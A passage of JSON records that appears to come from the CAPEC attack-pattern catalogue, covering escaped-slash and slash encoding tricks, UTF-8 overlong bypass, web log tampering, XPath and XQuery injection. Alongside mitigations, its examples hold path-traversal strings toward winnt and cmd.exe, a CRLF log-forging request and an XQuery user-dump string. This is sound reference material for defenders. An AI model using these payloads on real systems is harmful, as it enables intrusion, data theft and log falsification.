Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Mitigations, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"}]}},"78":{"ID":"78","Name":"Using Escaped Slashes in Alternate Encoding","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets the use of the backslash in alternate encoding. An attacker can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the attacker tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"The attacker can send input data to the host target (e.g., via http request or command line request"},{"Step":"2","Phase":"Experiment","Description":"The attacker craft malicious input data which includes escaped slashes. The attacker may need multiple attempts before finding a successful combination."}]},"Prerequisites":{"Prerequisite":["The application accepts the backlash character as escape character.","The application server does incomplete input data decoding, filtering and validation."]},"Skills_Required":{"Skill":["The attacker can naively try backslash character and discover that the target host uses it as escape character.",{"Level":"Low"},"The attacker may need deep understanding of the host target in order to exploit the vulnerability. The attacker may also use automated tools to probe for this vulnerability.",{"Level":"Medium"}]},"Indicators":{"Indicator":"An attacker can use a fuzzer in order to probe for this vulnerability. The fuzzer should generate suspicious network activity noticeable by an intrusion detection system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Verify that the user-supplied data does not use backslash character to escape malicious characters.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system.","Be aware of the threat of alternative method of data encoding.","Regular expressions can be used to filter out backslash. Make sure you decode before filtering and validating the untrusted input data.","In the case of path traversals, use the principle of least privilege when determining access rights to file systems. Do not allow users to access directories/files that they should not access.","Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.","Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."]},"Example_Instances":{"Example":[{"p":"For example, the byte pair \\\\0 might result in a single zero byte (a NULL) being sent. Another example is \\\\t, which is sometimes converted into a tab character. There is often an equivalent encoding between the back slash and the escaped back slash. This means that \\\\/ results in a single forward slash. A single forward slash also results in a single forward slash. The encoding looks like this:","div":["/ yields /",{"style":"margin-left:10px;","class":"informative"}]},{"div":["Attack Example: Escaped Slashes in Alternate Encodings",{"style":"color:#32498D; font-weight:bold;"},"CWD ..\\\\/..\\\\/..\\\\/..\\\\/winnt",{"style":"margin-left:10px;","class":"informative"},"CWD ../../../../winnt",{"style":"margin-left:10px;","class":"informative"},"int main(int argc, char* argv[])",{"style":"margin-left:10px;","class":"informative","div":["puts(\\"\\\\/ \\\\\\\\ \\\\? \\\\. \\\\| \\");",{"style":"margin-left:10px;"}]},"/ \\\\ ? . |",{"style":"margin-left:10px;","class":"informative"},"CWD ..\\\\?\\\\?\\\\?\\\\?\\\\/..\\\\/..\\\\/..\\\\/winnt",{"style":"margin-left:10px;","class":"informative"}],"p":["An attack leveraging this pattern is very simple. If you believe the target may be filtering the slash, attempt to supply \\\\/ and see what happens. Example command strings to try out include","which converts in many cases to","To probe for this kind of problem, a small C program that uses string output routines can be very useful. File system calls make excellent testing fodder. The simple snippet","produces the output","Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities:"]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"180"},{"CWE_ID":"181"},{"CWE_ID":"173"},{"CWE_ID":"172"},{"CWE_ID":"73"},{"CWE_ID":"22"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"79":{"ID":"79","Name":"Using Slashes in Alternate Encoding","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets the encoding of the Slash characters. An attacker would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the attacker many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"The attacker has access to a resource path and required to use slashes as resource delimiter."},{"Step":"2","Phase":"Experiment","Description":"The attacker tries variation and combination of the slashes characters in different encoding format."},{"Step":"3","Phase":"Experiment","Description":"The attacker found an unfiltered combination which maps to a valid path and accesses unauthorized resources (directories, files, etc.)"}]},"Prerequisites":{"Prerequisite":["The application server accepts paths to locate resources.","The application server does insufficient input data validation on the resource path requested by the user.","The access right to resources are not set properly."]},"Skills_Required":{"Skill":["An attacker can try variation of the slashes characters.",{"Level":"Low"},"An attacker can use more sophisticated tool or script to scan a website and find a path filtering problem.",{"Level":"Medium"}]},"Indicators":{"Indicator":["If the first path decoding process has left some invalid or denylisted characters, that may be a sign that the request is malicious.","Traffic filtering with IDS (or proxy) can detect request with suspicious URLs. IDS may use signature based identification to reveal such URL based attacks.","An attacker can use a fuzzer in order to probe for a UTF-8 encoding vulnerability. The fuzzer should generate suspicious network activity."]},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process. Refer to the RFCs to safely decode URL.","When client input is required from web-based forms, avoid using the \\"GET\\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \\"POST method whenever possible.","There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)","Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section)","Test your path decoding process against malicious input.","In the case of path traversals, use the principle of least privilege when determining access rights to file systems. Do not allow users to access directories/files that they should not access.","Assume all input is malicious. Create an allowlist that defines all valid input to the application based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system."]},"Example_Instances":{"Example":{"div":["Attack Example: Slashes in Alternate Encodings",{"style":"color:#32498D; font-weight:bold;"},"http://target server/some_directory\\\\..\\\\..\\\\..\\\\winnt",{"style":"margin-left:10px;","class":"informative"},"http://target server/some_directory/../../../winnt",{"style":"margin-left:10px;","class":"informative"},"http://target server/some_directory\\\\..%5C..%5C..\\\\winnt",{"style":"margin-left:10px;","class":"informative"}],"p":["The two following requests are equivalent on most Web servers:","is equivalent to","Multiple encoding conversion problems can also be leveraged as various slashes are instantiated in URL-encoded, UTF-8, or Unicode. Consider the strings","where %5C is equivalent to the \\\\ character."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"173"},{"CWE_ID":"180"},{"CWE_ID":"181"},{"CWE_ID":"20"},{"CWE_ID":"74"},{"CWE_ID":"73"},{"CWE_ID":"22"},{"CWE_ID":"185"},{"CWE_ID":"200"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-525"},{"External_Reference_ID":"REF-495"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Indicators, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"80":{"ID":"80","Name":"Using UTF-8 Encoding to Bypass Validation Logic","Abstraction":"Detailed","Status":"Draft","Description":"This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the \\"shortest possible\\" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"PeerOf","CAPEC_ID":"64"},{"Nature":"PeerOf","CAPEC_ID":"71"},{"Nature":"ChildOf","CAPEC_ID":"267"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for user-controllable inputs] Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.","Technique":["Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Probe entry points to locate vulnerabilities] The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various UTF-8 encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.","Technique":["Try to use UTF-8 encoding of content in Scripts in order to bypass validation routines.","Try to use UTF-8 encoding of content in HTML in order to bypass validation routines.","Try to use UTF-8 encoding of content in CSS in order to bypass validation routines."]}]},"Prerequisites":{"Prerequisite":["The application\'s UTF-8 decoder accepts and interprets illegal UTF-8 characters or non-shortest format of UTF-8 encoding.","Input filtering and validating is not done properly leaving the door open to harmful characters for the target host."]},"Skills_Required":{"Skill":["An attacker can inject different representation of a filtered character in UTF-8 format.",{"Level":"Low"},"An attacker may craft subtle encoding of input data by using the knowledge that they have gathered about the target host.",{"Level":"Medium"}]},"Indicators":{"Indicator":["A web page that contains overly long UTF-8 codes constitute a protocol anomaly, and could be an indication that an attacker is attempting to exploit a vulnerability on the target host.","An attacker can use a fuzzer in order to probe for a UTF-8 encoding vulnerability. The fuzzer should generate suspicious network activity noticeable by an intrusion detection system.","An IDS filtering network traffic may be able to detect illegal UTF-8 characters."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["The Unicode Consortium recognized multiple representations to be a problem and has revised the Unicode Standard to make multiple representations of the same code point with UTF-8 illegal. The UTF-8 Corrigendum lists the newly restricted UTF-8 range (See references). Many current applications may not have been revised to follow this rule. Verify that your application conform to the latest UTF-8 encoding specification. Pay extra attention to the filtering of illegal characters.",{"p":["The exact response required from an UTF-8 decoder on invalid input is not uniformly defined by the standards. In general, there are several ways a UTF-8 decoder might behave in the event of an invalid byte sequence:","It is possible for a decoder to behave in different ways for different types of invalid input.","RFC 3629 only requires that UTF-8 decoders must not decode \\"overlong sequences\\" (where a character is encoded in more bytes than needed but still adheres to the forms above). The Unicode Standard requires a Unicode-compliant decoder to \\"...treat any ill-formed code unit sequence as an error condition. This guarantees that it will neither interpret nor emit an ill-formed code unit sequence.\\"","Overlong forms are one of the most troublesome types of UTF-8 data. The current RFC says they must not be decoded but older specifications for UTF-8 only gave a warning and many simpler decoders will happily decode them. Overlong forms have been used to bypass security validations in high profile products including Microsoft\'s IIS web server. Therefore, great care must be taken to avoid security issues if validation is performed before conversion from UTF-8, and it is generally much simpler to handle overlong forms before any input validation is done.","To maintain security in the case of invalid input, there are two options. The first is to decode the UTF-8 before doing any input validation checks. The second is to use a decoder that, in the event of invalid input, returns either an error or text that the application considers to be harmless. Another possibility is to avoid conversion out of UTF-8 altogether but this relies on any other software that the data is passed to safely handling the invalid data.","Another consideration is error recovery. To guarantee correct recovery after corrupt or lost bytes, decoders must be able to recognize the difference between lead and trail bytes, rather than just assuming that bytes will be of the type allowed in their position."],"div":{"style":"margin-left:10px;","ul":{"li":["1. Insert a replacement character (e.g. \'?\', \'\').","2. Ignore the bytes.","3. Interpret the bytes according to a different character encoding (often the ISO-8859-1 character map).","4. Not notice and decode as if the bytes were some similar bit of UTF-8.","5. Stop decoding and report an error (possibly giving the caller the option to continue)."]}}},"For security reasons, a UTF-8 decoder must not accept UTF-8 sequences that are longer than necessary to encode a character. If you use a parser to decode the UTF-8 encoding, make sure that parser filter the invalid UTF-8 characters (invalid forms or overlong forms).","Look for overlong UTF-8 sequences starting with malicious pattern. You can also use a UTF-8 decoder stress test to test your UTF-8 parser (See Markus Kuhn\'s UTF-8 and Unicode FAQ in reference section)","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input."]},"Example_Instances":{"Example":{"p":["Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this","the server didn\'t correctly handle %c0%af in the URL. What do you think %c0%af means? It\'s 11000000 10101111 in binary; and if it\'s broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence.","So when the attacker requested the tainted URL, they accessed","In other words, they walked out of the script\'s virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where they could pass commands to the command shell, Cmd.exe."],"div":["http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe",{"style":"margin-left:10px;","class":"attack"},"http://servername/scripts/../../winnt/system32/cmd.exe",{"style":"margin-left:10px;","class":"result"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"173"},{"CWE_ID":"172"},{"CWE_ID":"180"},{"CWE_ID":"181"},{"CWE_ID":"73"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"692"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-112","Section":"5.9. Character Encoding"},{"External_Reference_ID":"REF-530","Section":"Chapter 12"},{"External_Reference_ID":"REF-531"},{"External_Reference_ID":"REF-532","Section":"UTF-8"},{"External_Reference_ID":"REF-533"},{"External_Reference_ID":"REF-114"},{"External_Reference_ID":"REF-535"},{"External_Reference_ID":"REF-525"},{"External_Reference_ID":"REF-537"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Mitigations, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"81":{"ID":"81","Name":"Web Logs Tampering","Abstraction":"Detailed","Status":"Draft","Description":"Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to \\"Log Injection-Tampering-Forging\\" except that in this case, the attack is targeting the logs of the web server and not the application.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"268"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine Application Web Server Log File Format] The attacker observes the system and looks for indicators of which logging utility is being used by the web server.","Technique":"Determine logging utility being used by application web server (e.g. log4j), only possible if the application is known by the attacker or if the application returns error messages with logging utility information."},{"Step":"2","Phase":"Experiment","Description":"[Determine Injectable Content] The attacker launches various logged actions with malicious data to determine what sort of log injection is possible.","Technique":"Attacker triggers logged actions with maliciously crafted data as inputs, parameters, arguments, etc."},{"Step":"3","Phase":"Exploit","Description":"[Manipulate Log Files] The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted request that the web server will receive and write into the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.","Technique":[{"p":["Indirectly through injection, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.","For example: The HTTP request for \\"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \\"GET /forged-path HTTP/1.1\\" 200 - \\"-\\" USER_AGENT\\" may add the log line into Apache \\"access_log\\" (for example). Different applications may require different encodings of the carriage return and line feed characters."]},{"p":["Directly through log file or database manipulation, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.","For example: The HTTP request for \\"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \\"GET /forged-path HTTP/1.1\\" 200 - \\"-\\" USER_AGENT\\" may add the log line into Apache \\"access_log\\" (for example). Different applications may require different encodings of the carriage return and line feed characters."]},"Directly through log file or database manipulation, modify existing log entries."]}]},"Prerequisites":{"Prerequisite":"Target server software must be a HTTP server that performs web logging."},"Skills_Required":{"Skill":["To input faked entries into Web logs",{"Level":"Low"}]},"Resources_Required":{"Resource":"Ability to send specially formatted HTTP request to web server"},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Data"}},"Mitigations":{"Mitigation":["Design: Use input validation before writing to web log","Design: Validate all log data before it is output"]},"Example_Instances":{"Example":"Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator\'s host or local network."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"117"},{"CWE_ID":"93"},{"CWE_ID":"75"},{"CWE_ID":"221"},{"CWE_ID":"96"},{"CWE_ID":"20"},{"CWE_ID":"150"},{"CWE_ID":"276"},{"CWE_ID":"279"},{"CWE_ID":"116"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"83":{"ID":"83","Name":"XPath Injection","Abstraction":"Detailed","Status":"Draft","Description":"An attacker can craft special user-controllable input consisting of XPath expressions to inject the XML database and bypass authentication or glean information that they normally would not be able to. XPath Injection enables an attacker to talk directly to the XML database, thus bypassing the application completely. XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"250"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] Using a browser or an automated tool, an attacker records all instances of user-controllable input used to contruct XPath queries.","Technique":["Use an automated tool to record all instances of user-controllable input used to contruct XPath queries.","Use a browser to manually explore the website and analyze how the application processes inputs."]},{"Step":"2","Phase":"Explore","Description":"[Determines the structure of queries] Using manual or automated means, query inputs found for XPath weaknesses.","Technique":["Use an automated tool automatically probe the inputs for XPath weaknesses.","Manually probe the inputs using characters such as single quote (\') that can cause XPath-releated errors, thus indicating an XPath weakness."]},{"Step":"3","Phase":"Exploit","Description":"[Exploit the target] Craft malicious content containing XPath expressions that is not validated by the application and is executed as part of the XPath queries.","Technique":"Use the crafted input to execute unexpected queries that can disclose sensitive database information to the attacker."}]},"Prerequisites":{"Prerequisite":["XPath queries used to retrieve information stored in XML documents","User-controllable input not properly sanitized before being used as part of XPath queries"]},"Skills_Required":{"Skill":["XPath Injection shares the same basic premises with SQL Injection. An attacker must have knowledge of XPath syntax and constructs in order to successfully leverage XPath Injection",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Indicators":{"Indicator":"Too many exceptions generated by the application as a result of malformed XPath queries"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XPath expression. Characters such as a single-quote(\') or operators such as or (|), and (&) and such should be filtered if the application does not expect them in the context in which they appear. If such content cannot be filtered, it must at least be properly escaped to avoid them being interpreted as part of XPath expressions.","Use of parameterized XPath queries - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails.","Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application."]},"Example_Instances":{"Example":"Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"91"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"707"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"39","Entry_Name":"XPath Injection"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Blind XPath Injection"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"XPATH Injection"}]},"References":{"Reference":{"External_Reference_ID":"REF-611","Section":"Testing for XPATH Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"84":{"ID":"84","Name":"XQuery Injection","Abstraction":"Detailed","Status":"Draft","Description":"This attack utilizes XQuery to probe and attack server systems; in a similar manner that SQL Injection allows an attacker to exploit SQL calls to RDBMS, XQuery Injection uses improperly validated data that is passed to XQuery commands to traverse and execute commands that the XQuery routines have access to. XQuery injection can be used to enumerate elements on the victim\'s environment, inject commands to the local host, or execute queries to remote files and data sources.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"250"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for user-controllable inputs] Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.","Technique":["Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Determine user-controllable input susceptible to injection] Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to XQL injection, attempt to inject characters that have special meaning in XQL. The goal is to create an XQL query with an invalid syntax.","Technique":["Use web browser to inject input through text fields or through HTTP GET parameters.","Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.","Use XML files to inject input.","Use network-level packet injection tools such as netcat to inject input","Use modified client (modified by reverse engineering) to inject input."]},{"Step":"3","Phase":"Exploit","Description":"[Information Disclosure] The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to inappropriate disclosure of information.","Technique":"Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload. The payload aims to get information on the structure of the underlying XML database and/or the content in it."},{"Step":"4","Phase":"Exploit","Description":"[Manipulate the data in the XML database] The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to modification of application data.","Technique":"Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload.. The payload tries to insert or replace data in the XML database."}]},"Prerequisites":{"Prerequisite":"The XQL must execute unvalidated data"},"Skills_Required":{"Skill":["Basic understanding of XQuery",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Design: Perform input allowlist validation on all XML input","Implementation: Run xml parsing and query infrastructure with minimal privileges so that an attacker is limited in their ability to probe other system resources from XQL."]},"Example_Instances":{"Example":{"p":["An attacker can pass XQuery expressions embedded in otherwise standard XML documents. Like SQL injection attacks, the attacker tunnels through the application entry point to target the resource access layer. The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back.","The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL."],"div":["doc(accounts.xml)//user[Name=\'*\']",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"74"},{"CWE_ID":"707"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"46","Entry_Name":"XQuery Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated 